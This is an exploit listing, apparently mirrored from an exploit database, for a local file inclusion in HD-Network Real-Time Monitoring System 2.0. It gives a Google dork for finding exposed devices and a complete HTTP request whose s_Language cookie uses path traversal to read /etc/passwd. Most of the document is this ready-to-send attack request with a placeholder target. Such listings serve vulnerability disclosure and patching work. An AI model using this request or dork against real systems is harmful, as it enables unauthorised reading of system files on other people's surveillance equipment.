Exploit for HD-Network Real-Time Monitoring System 2.0 Local File Inclusion

Name: Exploit for HD-Network Real-Time Monitoring System 2.0 Local File Inclusion
Rating: 5 (114 reviews)

2021-12-13 | CVSS -0.3

## https://sploitus.com/exploit?id=PACKETSTORM:165242
# Exploit Title: HD-Network Real-time Monitoring System 2.0 - Local File Inclusion (LFI)  
# Google Dork: intitle:"HD-Network Real-time Monitoring System V2.0"  
# Date: 11/12/2021  
# Exploit Author: Momen Eldawakhly (Cyber Guy)  
# Vendor Homepage: N/A  
# Version: V2.0  
# Tested on: Nginx NVRDVRIPC Web Server  
  
Proof of Concept:  
  
GET /language/lang HTTP/1.1  
Referer: http://example.com  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36  
Cookie: s_asptitle=HD-Network%20Real-time%20Monitoring%20System%20V2.0; s_Language=../../../../../../../../../../../../../../etc/passwd; s_browsertype=2; s_ip=; s_port=; s_channum=; s_loginhandle=; s_httpport=; s_sn=; s_type=; s_devtype=  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Encoding: gzip,deflate,br  
Host: VulnIP  
Connection: Keep-alive